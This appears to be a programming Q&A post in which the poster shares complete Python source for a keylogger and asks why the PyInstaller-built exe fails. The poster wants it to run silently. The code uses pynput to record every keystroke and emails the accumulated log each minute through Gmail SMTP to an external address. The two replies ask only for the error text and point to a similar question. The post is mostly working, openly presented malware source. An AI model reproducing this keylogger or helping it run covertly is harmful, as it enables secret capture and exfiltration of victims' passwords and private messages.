# Pyinstaller problem : i created an exe with it but when it fails to be excuted

Tags: python, pyinstaller

```py
import pynput.keyboard
import threading
import smtplib
from email.message import EmailMessage
import subprocess


log = ""

class Keylogger:

    def press(self, key):
            global log
            try:
                log = log + str(key.char)
            except AttributeError:
                if key == key.space:
                    log = log + " "
                elif key == key.tab:
                    log = log +" "
                elif key == key.backspace:
                    log = log + " <= "
                elif key == key.alt_l:
                    log = log + " "
                elif key == key.shift_l:
                    log = log + " "
                elif key == key.caps_lock:
                    log = log + " "
                elif key == key.enter:
                    log = log + " ENTER "
                elif key == key.shift_r:
                    log = log + " "
                elif key == key.esc:
                    log = log + " "
                elif key == key.cmd:
                    log = log + " "
                elif key == key.alt_gr:
                    log = log + " "
                elif key == key.ctrl_l:
                    log = log + " "
                elif key == key.ctrl_r:
                    log = log + " "
                else:
                    log = log + " " + str(key) + " "

    def report(self):
        global log 
        self.send_mail()
        log = ""
        timer = threading.Timer(60, self.report)
        timer.start()

    def send_mail(self):
        server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
        sender = '******************'
        server.login(sender, '******')
        msg = EmailMessage()
        msg['From'] = sender
        msg['To'] = "kirtumiydo@biyac.com"
        msg['Subject'] = "LOGS"
        body = (log)
        msg.set_content(body)
        server.send_message(msg)
        server.quit()

    def start(self):
        Listener = pynput.keyboard.Listener(on_press = self.press) 
        with Listener:
            self.report()
            Listener.join()
XLogger = Keylogger()
XLogger.start()
```

[image: packing it and the error shown]

i wrote a keylogger using python, it works properly when running it from cmd , but i want it silent as exe , i tried to convert it using pyinstaller, but it keeps sgowing me this erros .

Comment: Can you share the info in that image as text?

Comment: There are similar questions here with this exact error, like [this one](https://stackoverflow.com/questions/40716346/windows-pyinstaller-error-failed-to-execute-script-when-app-clicked), did that not help? You didn't say whether or not you actually searched for the problem, so if you did, please show us what you've tried so far.